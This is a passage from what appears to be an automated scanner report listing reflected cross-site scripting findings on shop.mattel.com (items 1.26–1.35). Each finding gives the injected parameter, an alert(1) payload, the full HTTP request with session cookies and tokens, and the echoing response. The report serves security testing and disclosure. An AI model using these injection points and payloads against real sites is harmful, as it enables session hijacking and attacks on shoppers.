Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:40 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50920


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="display=store11184"-alert(1)-"137cfc99da6&subdisplay=contact";
   </script>
...[SNIP]...

1.26. http://shop.mattel.com/helpdesk/index.jsp [display parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the display request parameter is copied into an HTML comment. The payload ae7c4--><script>alert(1)</script>8529c1ade60 was submitted in the display parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp?display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:41 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50952


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<!-- === Request Query String: display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact -->
...[SNIP]...

1.27. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f74"-alert(1)-"bafccbb8a5f was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store47f74"-alert(1)-"bafccbb8a5f&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51072


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
= {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store47f74"-alert(1)-"bafccbb8a5f&subdisplay=contact";
   </script>
...[SNIP]...

1.28. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 58f03--><script>alert(1)</script>ff989ba6b7c was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:39 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51104


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact -->
...[SNIP]...

1.29. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b7d"-alert(1)-"374d85b5440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp?a6b7d"-alert(1)-"374d85b5440=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:36 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50860


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="a6b7d"-alert(1)-"374d85b5440=1";
   </script>
...[SNIP]...

1.30. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 682a0--><script>alert(1)</script>d018437814a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp?682a0--><script>alert(1)</script>d018437814a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50892


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<!-- === Request Query String: 682a0--><script>alert(1)</script>d018437814a=1 -->
...[SNIP]...

1.31. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the stillHaveQuestion request parameter is copied into an HTML comment. The payload 900f6--><script>alert(1)</script>fcf53bf03ee was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes900f6--><script>alert(1)</script>fcf53bf03ee HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41092


                                                                                                                                                                                                                        <!D
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact&stillHaveQuestion=yes900f6--><script>alert(1)</script>fcf53bf03ee -->
...[SNIP]...

1.32. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the stillHaveQuestion request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33980"-alert(1)-"a02d5e30f09 was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes33980"-alert(1)-"a02d5e30f09 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:48 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41060


                                                                                                                                                                                                                        <!D
...[SNIP]...
US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact&stillHaveQuestion=yes33980"-alert(1)-"a02d5e30f09";
   </script>
...[SNIP]...

1.33. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the subdisplay request parameter is copied into an HTML comment. The payload 3f282--><script>alert(1)</script>79695b33cda was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact3f282--><script>alert(1)</script>79695b33cda HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:45 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40113


                                                                                                                                                                                                                        <!D
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact3f282--><script>alert(1)</script>79695b33cda -->
...[SNIP]...

1.34. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the subdisplay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783bb"-alert(1)-"a156f112195 was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact783bb"-alert(1)-"a156f112195 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:44 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40048


                                                                                                                                                                                                                        <!D
...[SNIP]...

       ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact783bb"-alert(1)-"a156f112195";
   </script>
...[SNIP]...

1.35. http://shop.mattel.com/home/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 8d597--><script>alert(1)</script>d903fe711aa was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US8d597--><script>alert(1)</script>d903fe711aa HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
